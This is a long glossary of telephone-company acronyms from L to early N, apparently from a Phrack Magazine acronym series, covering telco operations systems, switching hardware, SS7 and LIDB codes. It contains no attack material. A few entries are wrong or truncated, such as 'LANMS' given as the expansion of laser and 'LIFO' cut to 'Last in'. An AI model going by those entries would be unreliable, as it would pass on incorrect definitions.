L2DOWN       Level 2 is inoperable.
L2QLTY       Poor level 2 transmission quality.
L3-ERC       Layer 3 error control (IOS)
L3M          Layer 3 mgr. (IOS)
LA           Local area data channel INTER/TRA blocal 1-26
LA           Loop assignment
LAC          LAN application controller
LAC          Loop assignment center
LAD          Label definition
LAD          Loop activity data
LADS         Local area data service
LADT         Local access data transport
LADT         Local area data transport
LAI          Line equipment assignment inquiry
LAIS         Local automatic intercept system
LAJMS        Ledger and journal maintenance system
LAMA         Local automatic message accounting
LAMA-C       Computerized local AMA for No. 5 crossbar
LAN          Local area network
LANMS        Light amplified by stimulated emission of radiation
LAP          Link access protocol
LAPB         (LAP-B) link access procedure of balanced mode
LAPD         (LAP-D) link access procedure of D-channels
LAPD         Link access procedure on the D channel
LAPM         (LAP-M) link access protocol for modems
LAPX         Lapb extended (t.71)
LARG         Lidb access routing guide
LASS         Local alarm scanning system
LASS         Local area signaling service
LAT          Local access termianl (RMS-D1)
LATA         Local access and transport area
LATA         Local access and transport areas
LATA         Local access transport area
LATIS        Loop activity tracking information system
LATIS I/F    Loop activity tracking information system interface
LATIS/INPUT  Locally developed program used to input to the latis system
LB           Voice-non switched line-service code for LATA access
LBBD         Loopback B1
LBI          Load balance index
LBK          Loop test (SARTS command)
LBK          Loopback
LBL          Online tape label printing
LBNCGI       LIDB BNS message with call gapping indicator present
LBNGM        LIDB BNS garbled message
LBNMGM       LIDB BNS return value missing group or misrouted
LBNNAN       LIDB BNS return value no translation for an address of such
              nature
LBNNCG       LIDB BNS return value network congestion
LBNNFL       LIDB BNS return value network failure
LBNNPG       LIDB BNS return value nonparticipating group
LBNNSA       LIDB BNS return value no translation for this specific address
LBNREJ       LIDB BNS reject message received
LBNSCG       LIDB BNS return value subsystem congestion
LBNSFL       LIDB BNS return value subsystem failure
LBNTO        LIDB BNS message missed because of timeout
LBNUP        LIDB BNS message with unexpected reply
LBNUUR       LIDB BNS return value unequipped user
LBO          Line buildout
LBP          Load balance parameters
LBR          Large business remote
LBRV         Low bit rate voice
LBS          Land and building system
LBS          Load balance system
LBS          Load balance system (BTL) module of tnds
LBST         Loopback device signature table
LBU          Loopback devices signature table
LBU          Loopback unit
LBn          Loopback channel bn request (command in IOM2 monitor and EOC)
LC           Line card
LC           Line count
LC           Output line count
LC           Pending service order count
LC           Voice-switched line-service code for LATA access
LCAMOS       Loop cable administration and maintenance operations system
              (predictor)
LCC          Line class code
LCCIS        Local common channel interoffice signaling
LCCL         Line card cable
LCCLN        Line card cable narrative
LCD          List cable summary
LCDCGI       LIDB CCRD message with call gapping indicator present
LCDGM        LIDB CCRD garbled message
LCDMGM       LIDB CCRD return value missing group or misrouted
LCDN         Last called directory number
LCDNAN       LIDB CCRD return value no translation for an address of such nature
LCDNCG       LIDB CCRD return value network congestion
LCDNFL       LIDB CCRD return value network failure
LCDNPG       LIDB CCRD return value nonparticipating group
LCDNSA       LIDB CCRD return value no translation for this specific address
LCDR         Local call detail recording
LCDREJ       LIDB CCRD reject message received
LCDSCG       LIDB CCRD return value subsystem congestion
LCDSFL       LIDB CCRD return value subsystem failure
LCDTO        LIDB CCRD message missed because of timeout
LCDUP        LIDB CCRD message with unexpected reply
LCDUUR       LIDB CCRD return value unequipped user
LCE          Line concentrating equipment frame
LCEN         Line card equipment number
LCI          LAN CPU interface
LCIE         Lightguide cable interconnection equipment
LCLOC        Line card location
LCM          Line concentrating module
LCMC         Line concentrating controller module
LCN          Logical channel number
LCN          Logical channel numbers
LCOS         Line Class of service (GTE)
LCP          Language conversion program
LCP          List cable pairs
LCR          Least cost routing
LCR          Line concentration ratio
LCRMKR       Line card remarks
LCS.MIT.EDU  Telecomm digest archive site on the Internet
LCS7         Link controller for signaling system No.7
LCSE         Line card service and equipment
LCSEN        Line card service and equipment narrative
LD           Load
LD           Loading division
LD           Long distance
LD           Voice switched trunk-service code for LATA access
LDBM         Listing data base maintenance
LDES         Long distance experimental schedule
LDM          Logical data model
LDMTS        Long distance message telecommunications service
LDN          Listed directory number
LDS          Local digital switch
LDSU2        Local digital service unit - model 2
LDT          Local display terminal
LDU          Long distance usage analysis
LE           Leading edge (bsp)
LE           Line equipment
LE           Local exchange (contains D-CTL)
LE           Voice and tone-radio landline-service code for LATA access
LEAD         Loop engineering assignment data
LEAP         System testing tool to simulate multiple 3270 users
LEAS         Lata equal access system
LEC          Local exchange carrier
LED          Last entry data
LED          Light emitting diode
LED          Light-emitting diode
LEE          Nac related line equipment transfer order establishment
LEFTS        Loop electronic forecasting and tracking system
LEG          Customer training file
LEIM         Loop electronic inventory module
LEIM         Loop electronics inventory module
LEIS         Loop engineering information system (applications)
LEN          Line equipment number
LENCL        Line equipment number class
LENG         Length
LERG         Local exchange routing guide
LET          Line equipment transfers
LETS         Law enforcement teletypewriter service
LEV          Level
LEW          Line equipment transfer withdrawal
LF           Data low-speed-service code for LATA access
LF           Lease file
LF           Line Finder
LF           Line feed
LF           Line finder
LF           Load factor
LF           Low frequance
LFACS        Loop facilities assignment and control system
LFACS        Loop facility assignment and control system
LFC          Load factor calculation
LFR          Line failure report
LFRC         Local field reporting code
LG           Basic data-service code for LATA access
LGC          Line group controller
LGN          List hunt groups
LH           Line hunting (i.252 f)
LH           Voice and data-psn access trunk-service code for LATA access
LI           Length indicator (SS7)
LI           Link interface
LIB          Line interface board
LIDB         Line information data base
LIDB         Line information database
LIE          Left in equipment
LIFECOST     Life cycle cost system
LIFO         Last in
LIJ          Left In Jumper
LIM          Less than the specified number of pairs
LIN          Line
LIN          Transmit alit data to COSMOS
LINCS        Lan integrated network communications system
LINIS        Line and number inventory system
LINK         Loop interface network
LINK1        The basic rate interface transmission extension (BRITE)
              link one is down
LINK2        The BRITE link two is down.
LINK3        The BRITE link three is down.
LINK4        The BRITE link four is down.
LINK5        The BRITE link five is down.
LINK6        The BRITE link six is down.
LIS          Library information system
LIST         Listen
LIT          Line insulation test
LIT          Line insulation testing parameters
LIU          Lats interface unit
LIU          Line interface unit
LIU          Line user interface
LJ           Voice and data ssn access-service code for LATA access
LK           Voice and data-ssn-intermachine trunk-service code for LATA
              access
LKNODE       Link node
LL           Logical link
LL           Long distance terminal line INTER/TRA blocal 1-26
LL           Long lines
LLC          Line load control
LLC          Low level controller    sipx6100
LLD          Low level device drivers (IOS)
LLDB         Location life data base
LLF          Line link frame
LLID         Ll identifier
LLL          Last look logic
LLN          Line link network
LLN          Line link network (ess)
LLP          Link layer protocol (lapd)
LLS          Local Line Switch (GTE)
LME          Line module equipment
LMMS         Local message metering system
LMOS         Loop maintenance operations system
LMOS         Loop maintenance operations systemr
LMOS F/E     Loop maintenance operations system front end
LMOS HOST    Loop maintenance operations system host
LMOS I/F     Loop maintenance operating system interface
LMS          Litigation management system
LMS          Loop maintenance system
LMS/TUM      Local measuring system/temporary usage measurement
LMT          Local maintance operations system
LMTS         Limits
LMU          Line multiplexer unit
LMX          L-multiplex
LN           Data extension
LN           Leased network
LN           Loop normal (on-hook normal)
LNA          Line and number administration
LNA          Low noise amplifier
LNBAS        Call failed due to the query being blocked at the switch
LNBN         Call failed due to the query being blocked in the CCS network
LNG          Longitudinal
LNS          Line number status
LO           Low threshold
LOA          Limit operator attempts
LOAD         Listing of acronym definition
LOC          Local
LOC          Local operating company
LOC          Location of cable on frame
LOCAP        Low capacitance
LOCN         Location
LOE          List originating line equipment
LOE          Location operating entity
LOES         Lajms online entry system
LOF          Lock off-line
LOF          Loss of frame
LOGIC        Logistics integrated control system
LOGU         Logical units assignments
LOMS         Loop assignment center operations management system
LON          Lock on-line
LONALS       Local off-net access lines
LP           Telephoto/facsimile-service code for LATA access
LPA          Link pack area
LPBK         Looped back
LPCDF        Low profile combined distributing frame
LPCDF        Low profile conventional distributing frame
LPIE         Loop plant improvement evaluator
LPIE2        Loop plant improvement evaluator 2
LPK          Line concentrating equipment line packs
LPM          Lines per minute
LPM          Logistic planning module
LPS          Log/print status
LPT          Loop test
LQ           Voice grade customized-service code for LATA access
LR           Loop reverse (off-hook normal)
LR           Protection relay-voice grade-service code for LATA access
LRAP         Long route analysis program
LRC          Longitudal redundancy check
LRC          Longitudinal redundancy check
LRIA1        Long run incremental analysis i
LRISP        Long range information systems planning organization
LRM          Line resource monitor-ims (BMC)
LRN          Local reference number
LROPP        Long-rangeoutside plant planning
LROT OR LRH  Local rotary
LRP          Long rang planning
LRS          Lease record system
LRS          Line repeater station
LRSS         Long range switching studies
LS           Local service INTER/TRA blocal 1-26
LS           Loop start signaling
LS&E         Local service and equipment
LSA          Local security administrator
LSA          Local subaccount
LSB          Lower side band
LSBS         Location specific bypass system
LSD&F        Local switching demand & facility data base system
LSDB         Listing service data base
LSDF         Local switching demand and facility data base system
LSDN         Local switched digital network
LSE          Line and station transfer order establishment
LSEC         Loss of sec (C/I channel code)
LSHF         Message LAN shelf
LSI          Large-scale integrated circuitry
LSL          Loss of signal level (C/I channel code)
LSM          Load synchronization mechanization
LSM          Local switching module
LSN          Logical session number
LSO          Local service office
LSO          Local storage option-ims (IBM)
LSRP         Local switching replacement planning
LSRP         Local switching replacement planning system
LSS          Lata switching systems
LSS          Listing service system
LSS          Listing services system
LSS          Loop switching system
LSSGR        Lata switching systems generic requirements
LSSI         Local special service inventory
LSSR         Local special service results
LSSU         Link state signal unit (SS7)
LSSU         Link status signal unit
LST          Line and station transfer
LSU          Line switch unit
LSU          Local storage unit
LSU          Loss of signal level of u interface (C/I channel code)
LSUE         Lsu error condition (C/I channel code)
LSV          Latch switch verification
LSV          Line status verifier
LSW          Line and station transfer withdrawal
LT           Lata tandem
LT           Line termination
LT           Local terminal
LT           Long distance terminal trunk INTER/TRA blocal 1-26
LT-S         Lt on s bus
LT-T         Lt on t interface
LTAB         Line test access bus
LTB          Last trunk busy
LTC          Line trunk controler
LTC          Local test cabinet
LTD          Local test desk
LTD          Local test desk (#16
LTD          Long term disability
LTD          Lt disable (C/I channel code)
LTERM        Logical terminal-ims (IBM)
LTF          Light terminal frame
LTF          Lightwave terminal frame
LTF          Lightwave terminating frame
LTF          Line trunk frame
LTG          Line translation group
LTG          Line trunk group
LTI          Loop termination identifier
LTMA         Lightwave terminal multiplex assembly
LTMA         Lightwave terminating multiplexing assembly
LTN          List telephone numbers
LTOP         Long term disability plan
LTP          Line and trunk peripherals
LTP          Local test port
LTP          Loop technology planning
LTS          Loss test set
LTU          Line trunk unit
LTUC         Ltu control
LU           Line unit
LU 6.2       Protocol for appc
LU2          Line unit model 2
LUA          Link up america tracking
LUCHBD       Line unit channel board
LUCOMC       Line unit common control
LUHLSC       Line unit high level service circuit
LUIF         Living unit interface file
LUM          Line utilization monitor-ims (BMC)
LUPEX        Line unit path exerciser
LURR         Large user reproduced records system
LV           Sdlv
LVL1ERR      Level 1 protocol error.
LVL2ERR      Level 2 protocol error.
LVL3ERR      Level 3 protocol error.
LVM          Line verification module
LW-SSS       Lightwave system support services by weco
LWC          Leave word calling
LX 2         Local originating
LX 2         Local terminating
LXE          Lightguide express entry
LZ           Dedicated facility-service code for LATA access
M            Latest date that this ticket can be loaded.
M            M(transmit) signal lead
M            Maintance
M            Minutes
M LETTER     Methods letter
M O          Master office
M S          Main station
M S          Mark sense
M&P          Methods and procedures
M-MONEY      Maintenance money
M-STARS      Measurement and statistics tracking and reporting system
M/ATR        Maritime/aviation tracking reports
M/W          Microwave
M5           Five-minute
MA           Cellular access trunk 2-way INTER/TRA blocal 1-26
MA           Maintenance administrator
MA           Multiple access (primary)
MA02         Status requested
MA03         Hourly report of system circuits and units in trouble
MA04         Reports condition of system - 1AESS maintenance
MA05         Maintenance interrupt count for last hour - 1AESS maintenance
MA06         Scanners
MA07         Successful switch of duplicated unit (program store etc.)
              - 1AESS
MA08         Excessive error rate of named unit -1AESS maintenance
MA09         Power should not be removed from named unit - 1AESS maintenance
MA10         Ok to remove paper - 1AESS maintenance
MA11         Power manually removed from unit - 1AESS maintenance
MA12         Power restored to unit - 1AESS maintenance
MA13         Indicates central control active - 1AESS maintenance
MA15         Hourly report of # of times interrupt recovery program acted - ma
MA17         Centrex data link power removed - 1AESS maintenance
MA21         Reports action taken on mac-rex command -1AESS maintenance msg
MA23         4 minute report- emergency action phase triggers are inhibited
MAB          Metallic access bus
MAC          Machine administration center
MAC          Major accounting center
MAC          Mechanized assignment control (BTL)
MAC          Missed appointment code
MAC          Monitor analysis & control of fa standard values
MACBS        Multi-access cable billing system
MACS         Major apparatus and cable system
MACS         Mechanized analysis of customer systems
MACS(DS)     Major apparatus control system (dist. svcs)
MADN         Multiple access directory numbers
MADPE        Address parity error
MAEC         Media access error counter
MAI          Multiple access interface (univac)
MAILLOG      Manager electronic mail logging system
MAINT        Maintenance
MAINT        Maintenance handler
MAL          Maintance action limits
MAL          Manual assignment list
MALRU        Mechanized automatic line record update
MALT         Maintence transmission action limit table
MAMA         Mechanized automatic message accounting
MAMA         Mobile automatic message accounting
MAN          Manual
MAN          Metropolitan area network
MAN          Miscellaneous account number
MAP          Maintance and administration position
MAP          Maintenance and administration position
MAP          Maintenance and administrative position (NTI)
MAP          Management assessment program
MAP          Manual assignment parameters
MAP          Manufacturing automation protocol
MAP          Mobile application part
MAPCI        Map command interpreter (NTI)
MAPPER       Maintain and prepare executive reports
MAPS         Mechanized accounts payable system
MAPS         Modeling and planning system (BTL)
MAPSS        Maintenance & analysis plan for special services
MAPSS        Maintenance and analysis plan for special services
MAQ          Manual assignment file inquiry
MAR          Market analysis report (BTL)
MAR          Microprogram address register
MAR          Multi-alternate route
MARC         Market analysis of revenue and customers system
MARC         Market analysis of revenues and customers
MARC/CAPS    Market analysis of personnel and customer analysis profile
MARCH        A computer system
MARG         Margin Parameter
MARK         Mechnized Assiment Record Keeping System (GTE COSMOS)
MARK IV      General purpose information storage and retrieval system
MARS         Mechanized automative repair system
MARS         Multiple access repair system
MAS          Interfacesmessage analysis sampling plan
MAS          Main store
MAS          Mass announcement system (900 service)
MAS          Memory administration system
MASB         Mas bus
MASC         Mas controller
MASM         Mas memory
MAST         Mail analysis and sales tracking
MAT          Manual assistance tag
MAT          Metropolitan area trunk
MATFAP       Metropolitan area transmission facility analysis program
MATR         Maritime/aviation tracking system
MATR         Modified answering time recorder
MATS         Marketing access tracking system
MATS         Mechanized analysis of traffic studies system
MAVIS        McDonnel Douglas automatic voice information system (model 1018t)
MAX          Maximum
MAX          Maximum messages
MAX          Maximum percentage value of entity fill or maximum ccs value
MAXS         Metallic automatic cross-connected system
MAY          Modify an assembly
MB           Make busy
MB           Make-busy or made-busy
MB/S         Megabits per second.
MBO          Management by objectives
MBP          Metallic bypass pair
MBPS         Megabits per second
MBX          Measured branch exchange
MBYTE        Megabyte
MC           Machine congestion
MC           Maintance connector
MC           Maintenance center
MC           Maintenance circuit
MC           Marker class of service
MC           Memory controller
MCA          Misrouted centralized automatic message accounting (MDII)
MCAS         Material cable administrative system
MCB          Message control bank (sperry)
MCC          Maintance control center
MCC          Maintenance control center
MCC          Manual camera control
MCC          Master control center
MCC          Minicuster controller
MCCI         Mechanized customer contact index
MCCRAP       Master control center trouble report analysis plan
MCCS         Mechanized calling card service
MCE          Establish a maintenance change ticket
MCH          Maintenance channel
MCH          Manually change hunt
MCHB         Maintenance channel buffer
MCI          Malicious call identification (i.251 g)
MCI          Microwave communications incorporated
MCIAS        Multi-channel intelligent announcement system
MCIAS        Multi-channel intercept announcement system
MCINT        Mate control interrupt
MCL          Maintenance change list
MCN          Machine congestion level # where MCI=machine congestion level
MCN          Master control number
MCN          Metropolitan campus network
MCOS         Multiplexer out of synchronization
MCP          Mechanized credit provisioning system
MCR          Establish a maintenance change repair
MCR          Mass call register
MCS          Master cpu subsystem
MCS          Meeting communications service
MCS          Multiple console support
MCTAP        Mechanized cable transfer administration plan
MCTRAP       Mechanized customer trouble report analysis plan
MCTSI        Module controller/time slot interchange
MCTSI        Module controller/time-slot interchange unit
MCW          Maintenance change ticket withdrawal
MD           SS7fe message distributor
MD/RS        Mechanized denial/restoral system
MDACS        Modular digital access control system
MDC          Manually disconnect a working circuit
MDC          Marker distributor control
MDC          Materials distribution center
MDC          Meridian digital centrex
MDCMES       Management development center mechanized enrollment system
MDF          Main distributing frame
MDF          Main distribution frame
MDII         Machine detected interoffice irregularities
MDII         Machine-detected interoffice irregularity
MDIS         Marketing data interface system
MDLIE        DLI interface error
MDOG         Mechanized disbursement of gasoline
MDP          SS7 fe message distribution protocol
MDR          Mechanized draft reconciliation
MDR          Message detail record
MDS          Message design systems
MDT          Management development/training
MDU          Marker decoder unit
MDX          Modular digital exchange
ME           Management employment
ME & ASSM    Management employment & assessment
ME CORP      Corporation management employment
MEANS        Model for economic analysis of network service
MEAS         Measure
MEASMT       Measurement
MEC          Maintenance engineer center
MEC          Manually establish a circuit
MEC          Mobile equipment console
MECA         Mechanization of engineering & circuit provisioning
MECAB        Multi exchange carrier access billing
MECCRRF      Mechanized credit reference system
MECH         More efficient call handling
MECOD        Multiple exchange carrier ordering and design
MED          Medium threshold
MED          Multipoint end-link data
MEDPLUS      Medicare part b reimbursement payments
MEDS         Mechanized expense distribution system
MEF          Master employee file
MELD         Mechanized engineering and layout for distributing frames
MEP          Medical expense plan
MERITS       Measurement of exchange records integrity through sampling
MERP         Mechanization of estimate results plan
MERS         Most economic route selection
MERT         Master employee record tape
MESA         Mechanized edits of street address
MESS         Message
MET          Multibuton electronic telephone
MET          Multibutton electronic telephone
METASX       Metallic access
MF           Mainboard firmware (IOS)
MF           Multi frame
MF           Multi frequency
MF           Multifrequency
MF           Multiplexer frame
MFAS         Mechanized forecasting and analysis system
MFC          Master file directory (VMS-catalog of UFDS)
MFC          Modular feature construction
MFC          Multiple frame operation control (IOS)
MFENET       Magnetic fusion energy network
MFFAN        Miscellaneous frame (CM2 offices only)
MFJ          Modification of final judgement
MFJ          Modification of final judgment
MFJ          Modified final judgment (consent decree)
MFR          Discmanufacture discontinued
MFR          Mechanized force report
MFR          Multi-frequency receivers
MFRS         Management force reporting system
MFS          Message formatting service-ims (IBM)
MFT          Metallic facility terminal
MFT          Multiprogramming with a fixed number of tasks
MG           Marker group
MG           Marker group number
MG           Mastergroup
MGB          Main ground bus
MGB          Master ground bar
MGBAF        Maintenance group blocking acknowledgment failure
MGR          Manager
MGSC         Message service customer counts
MGSG         Message service multi-line hunt
MGT          Mastergroup translator
MGUAF        Maintenance group unblocking acknowledgment failure
MH           Modified huffman code (fax)
MHD          Moving head disk
MHD          Moving head disk drive(s) used in the am.
MHDC         Moving head disk control
MHDDC        Moving head disk data/clock
MHS          Message handling service
MHS          Message handling system
MHZ          Megahertz
MI           Machine interface
MI           Message interface  on the
MI           Swbt minimal input
MIAS         Marketing information analysis system
MICA         Mechanized intercompany contract administration
MICC         Minicluster controller
MICE         Modular integrated communications environment
MICI         Mechanized independent company input
MICR         Minimal input customer records
MICRO/TEL    Micro/tel force analyzer
MICS         BTL maintenance space inventory control system
MICU         Message interface and clock unit
MICU         Message interface clock unit
MID          Master interim design
MIFM         Mechanized installation force management
MIG          Mechanized interval guide system
MIIS         Management inventory information system
MIMIC        Mts-wats intrastate model for incremental cost
MIN          Minimum
MIN          Minimum percentage value of entity fill or minimum CCS value
MIN          Mobile identification number
MINX         Multimedia information network exchange
MIOIO        I/O invalid operation error
MIOLE        I/O lock error
MIOPE        I/O bus parity error
MIOTO        I/O timer time out error
MIOUE        I/O unlock error
MIP          Microprocessor interface port
MIPP         Management surplus income protection plan
MIPS         Million instructions per second
MIR          Micro-instruction register
MIRA         Maintenance input request administrator .
MIRA         Mark iv information retrieval aid
MIS          Management information system
MIS          Mechanized intercepting system
MIS/C        Management information system/computer
MISC         Miscellaneous
MISCF        Miscellaneous frame
MISS         Management information staffing system
MITS         Microcomputer interactive test system
MIU          Metallic interdace unit
MIZAR        Management job evaluation
MJEC         Multiple job function codes
MJF          Modified final judgement
MJU          Multipoint junction unit
MKBUSY       Make busy.
MKR          Marker
MKTG         Marketing
ML           Matching loss
MLAC         Manual loop assignment center
MLC          Miniline card
MLC          Monitor level code
MLCD         Multi-line call detail
MLH          Multiline hunt
MLHG         Multi-line hung group
MLHG         Multiline hunt group
MLI          Message link interface
MLIIBLNG     Microlink II billing
MLNC         Failure to match and no circuit
MLPA         Modifiable link pack area (IBM)
MLSS         Machine load service summary
MLT          Mechanized loop test
MLT          Mechanized loop testing system
MLT-1        Mechanized loop testing system-1
MLT-2        Mechanized loop testing - the second generation of equipment
MLT-2        Mechanized loop testing system-2
MMA          Multi-module access unit (Univac)
MMC          Manually modify a circuit
MMC          Minicomputer maintenance center
MMEME        Memory system error
MMG          Minicomputer maintenance group
MMGT         Multimastergroup translator
MMI          Man-machine interface
MML          Man machine language
MMM          Message mile minute
MMOC         Minicomputer maintance operation center
MMOC         Minicomputer maintenance operations center
MMOCS        Minicomputer maintenance and operations center system
MMP          Module message processor
MMPP         Mechanized market programming procedures (BTL)
MMRCS        Minicomputer maintenance and repair center system
MMS          Main memory status
MMS          Memory management system
MMS/SSII     Marketing measurement system/support system II
MMS43        Modified monitoring state 43 code
MMSU         Modular metallic service unit
MMT          Multiple message threshold
MMU          Memory management unit (IOS)
MMX          Mastergroup multiplex
MN02         List of circuits in trouble in memory
MNP          Microcom networking protocol
MOC          Machine operations center
MOC          Maintenance and operations console
MOC          Maintenance operation console
MOC          Ministery of communication
MOC          Moe order completion
MOD          Ministery of defense
MOD          Modifier
MOD          Modulated
MOD          Module number
MOD1         Miscellaneous per SM measurements (MOD1)
MODCOES      Modified central office cost
MODEM        Modulator-demodulator
MOE          Mass oe transfers
MOF          Mass oe frame transfer listings
MOG          Minicomputer operations group
MOI          Maintenance and operation interface
MOI          Mizar order inquiry
MOMS         Missouri marketing system
MON          Monitor
MON          Monitor channel (i.e. IOM2)
MON          Mouth
MOOSA        Mechanized out of service adjustment system
MOOSE        Macs online organization system entry (distribution services)
MOS          Maintenance and operations subsystem
MOS          Metal oxide semiconductor
MOSOP        Mechanized operator services occupational payroll
MOST         Managing operations systems in transition
MOSTED       Motor vehicle/special tools expense distribution
MOT&R        Master office test and release circuit
MOTS         Mechanized operations tracking system
MOU          Minutes of use
MOU-AS       The annual study module of DRP/MOU
MOU-DA       The data accumulation module of DRP/MOU
MOVE         Move remote line Concentrating module
MOW          Moe order withdrawal
MP           Maintance POSITION
MP           Message processing program
MP           Microprocessor
MP           Multi-processor
MPAP         Management potential appraisal plan
MPC          Marker pulse conversion
MPC          Messages per customer
MPC          Mp command
MPCG         Message processing clerical guide
MPCH         Main parallel channel
MPDB-OS      Outside plant-pair gain
MPDBCOAR     MPDB-central office equipment and repair services
MPDBSRVC     Office supplies computers and other services
MPDU         Message protocpl data units (x.411)
MPES         Message processing entry system
MPFRS        Mechanized project force requirement system
MPI          Mechanized project impact system
MPK          Modify work package
MPLR         Mechanized plant location records system
MPLUM        Mechanized plant utilization management
MPN          Master work package number
MPOOS        Modem pool line out of service.
MPOW         Multiple purpose operator workstation
MPPD         Multi-purpose peripheral device
MPRIN        Mate peripheral interrupt
MPS          Mechanized pension system
MPS          Misplaced start pulse
MPS          Misplaced start pulse (MDII)
MPT          Message transfer part
MPTS         Market planning and tracking system
MQ           Metalic customized-service code for LATA access
MQH          Marker queue high
MQL          Marker queue low
MR           Maintenance request (BTL)
MR           Measured rate
MR           Message rate (BSP)
MR           Message register
MR           Message register COSMOS command
MR           Modified read (relative element address designate
MR           Monitor read (flow control bit in IOM2)
MR/IBPS      Management report/integrated budget and planning system
MRAA         Meter reading access arrangement
MRCS         Modification request control system
MRDB         Memory resident data base
MRDYT        Ready time out
MRF          Maintenance reset function
MRF          Message refusal received (outgoing)
MRF          Message retention file
MRFA         Mechanized repair force administration
MRFF         Master reference frequency frame
MRFIS        Mechanized request for information systems
MRO          Message register option
MRP          Mechanized revenue planning system
MRPS         Mobile radio priority system
MRR          Mandatory review reporting
MRS          Management reporting system (TNDS)
MRSELS       Microwave radio & satellite eng. & lic
MRTI         Message-rate treatment index  (AMA NTI)
MRTS         Mechanized real time tracking system
MRTTA        Message recording trunk trouble analysis
MRWPE        Read or write parity error
MS           Machine screw (BSP)
MS           Maintenance state
MS           Measured service
MS           Mechanized scheduling
MS           Memory subsystem
MS           Menue software (sipb.exe)
MS           Microseconds
MS6E         Message switching #6 equipment
MS7E         Message switching #7 equipment
MSA          Management science america
MSAG         Master street address guide
MSC          Media stimulated calling
MSC          Minimum service charge
MSCP         Mass storage control protocol
MSCS         Management scheduling and control system
MSCU         Message switch control unit
MSCU         Message switch controller unit
MSDS         Material safety data sheet system
MSFDB        Market share forecast data base
MSGBUF       Message buffer
MSGCLS       Message class
MSGLOCK      Message lock
MSGNO        Message number
MSGP         Microcomputer support group programming
MSGS         Message switch
MSK          Output a transaction mask
MSKMR        Mate reset
MSM          Multi-state marketing system
MSMTCH       Mismatch.
MSN          Multiple subscriber number (i.251 b)
MSORS        Mechanized sales office record system (BTL)
MSP          Management salary plan
MSP          Metropolitan service plan
MSPR         Message switch peripheral unit
MSR          Marketing surveys and reports
MSR          Mechanized sales results system (mbt directory sales)
MSR          Mechanized service record
MSR          Mizar status report
MSR/DIS      Mechanized service record/disability subsystem
MSS          Mass storage system
MSS          Mss is a dialup for... database of 1800 numbers...
MSSS         Mechanized supply stock system
MSTIC        Mechanized standard time increments (we/eplans)
MSTS         Measured service tracking system
MSU          Message signal unit
MSU          Metallic service unit
MSU          Msg. signal unit (SS7)
MSUCOM       Metallic service unit common
MSUS         Measured service usage studies
MSUSM        Subunit select mismatch
MT           Master record tape unit number or tape drive to write
MT           Wired music INTER/TRA blocal 1-26
MTA          Message transfer agent (x.400)
MTAE         Message transfer agent entity (x.400)
MTB          Magnetic tape billing
MTB          Metallic test bus
MTC          Facs maintenance transaction
MTCE         Maintenance (default).
MTCE         Maintenance parameters
MTD          Magnetic tape drive
MTD          Mutilated digit
MTD          Mutilated digit (MDII)
MTECS        Iimechanized toll error correction system phase ii
MTECS        Mechanized toll error correction system
MTEL         Main telephone
MTF          Master test frame
MTH          Magnetic tape handler
MTIB         Metallic test interconnect bus
MTIBAX       Metallic test interconnect bus access
MTINT        Miscellaneous timer interrupt
MTL          Maximum termination liability
MTLR         Mechanized trouble log report
MTLT         Maintance transmission action limit table
MTM          Maintenance trunk module (NTI)
MTO          Master terminal operator
MTP          Management transitional program
MTP          Message transfer part (SS7: q.701-q.710)
MTP          Message transfer part.
MTP          Message transfer protocol (x.411: p1)
MTR          Manually test a response
MTR          Mechanized time reporting
MTR          Tape drive to read
MTRS         Marketing or management time reporting system
MTRS         Mechanized training records system
MTRS/FCC     Management time reporting system/fcc report
MTRT         Mate ready time out
MTS          Manual test system
MTS          Memory time swich     peb2040
MTS          Message telecommunications service
MTS          Message telecommunications system
MTS          Message telephone service
MTS          Message teleprocessing system
MTS          Message toll service
MTS          Mobile telephone service
MTSC         MTS CMOS    (512 incoming channels)
MTSDB        Message telecommunications services data base
MTSI         Msg telecommunications ser price index
MTSL         MTS large  (1024 incoming channels)
MTSO         Mobile telephone switching office
MTSS         MTS small   (256 incoming channels)
MTTP         Master trunk test panel
MTU          Magnetic tape unit parameters
MTU          Maintenence termination unit
MTU          Media tech unit
MTW          Tape drive to write
MTX          Mobile telephone exchange
MU           Maintenance usage
MU           Message unit
MUC          Material usage code
MULDEM       Multiplexer-demultiplexer
MULT         Multiple
MUM          Measured unit message
MUNICH       Multichannel (32) network interface controller
MUPH         Multiple position hunt
MUSAC        Multipoint switching and conferencing unit
MUSIC        Modeling for usage sensitive incremental costs
MUT          Miniaturized universal trunk frame
MUT          Multi-unit-test
MUX          Multiplex
MUX          Multiplexer
MVAS         Motor vehicle accident summary
MVCCW        Commstar ii call waiting USOC
MVP          Multiline variety package
MVS          Multiple virtual storage
MVS          Multiple virtual storage operating
MVS/MODS     TSO display operator messages from programs running under
MVS/SP       Multiple virtual storages/system product operating system
MVS/SPA      Multiple virtual storages/system product assist operating
MVS/XA       Mutliple virtual storage/extended architecture
MVT          Multiprogramming with a variable number of tasks
MVTC         Motor vehicle type code
MW           (ger) service word
MW           Mandatory work
MW           Multiwink
MWCP         Mechanized wire centering program (BTL)
MWI          Message waiting indicator
MWPER        Write protect error
MX           Monitor transmit (flow control bit in IOM2)
MXU          Multiplex units
MXU          Multiplexer unit


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 24 of 27

                              {Acronyms Part IV}

N            Estimated time to complete this ticket.
N            No corrective action
N(R)         (NR) receive sequence number
N(S)         (NS) transmit sequence number
NA           CSACC link (EPSCS) INTER/TRA blocal 1-26
NA           Next address
NA           Normal alignment
NAAP         New affirmative action program
NAB          Network analysis bureau
NAC          Network administration center
NAC          Network application center
NAC          Non-area code
NACK         No ground acknowledgment received on a ground start private facility (FX) trunk
NAFMAP       Network administration force management and productivity
NAG          Network architecture group
NAI          Telephone number assignment inquiry
NAK          Negative acknowledge
NAM          Number assignment module
NAND         Not-and gate
NANP         North american numbering plan
NAP          Network access pricing
NAP          Network analysis program (BTL)
NAR          Nac assignment review
NARS         National yellow pages services accounts receivable system
NAS          Network analysis system
NAS          Numerical and atmospheric sciences network
NAS/CARS     Network analysis system/central analysis report system
NAS/SRS      Network analysis system/subscriber recording system (MBT)
NASS         Network adminstration support system
NATL         National code (NTI)
NAUG         Network administration user group
NB           Narrow band
NBSY         Number of busy (trunks) (NTI)
NC           CNCC link (SPSCS) INTER/TRA blocal 1-26
NC           Network channel
NC           No circuit
NCA          No circuit announcement
NCAT         Network cost analysis tool
NCC          National coordinating center (national emergency)
NCC          Network control center
NCC          Notify corrupted CRC (in EOC)
NCCF         Network communication control facility (IBM vtam/mcp option)
NCCF         Network communications control facility
NCD          Network call denial
NCDAFTA      NCD denied after answer
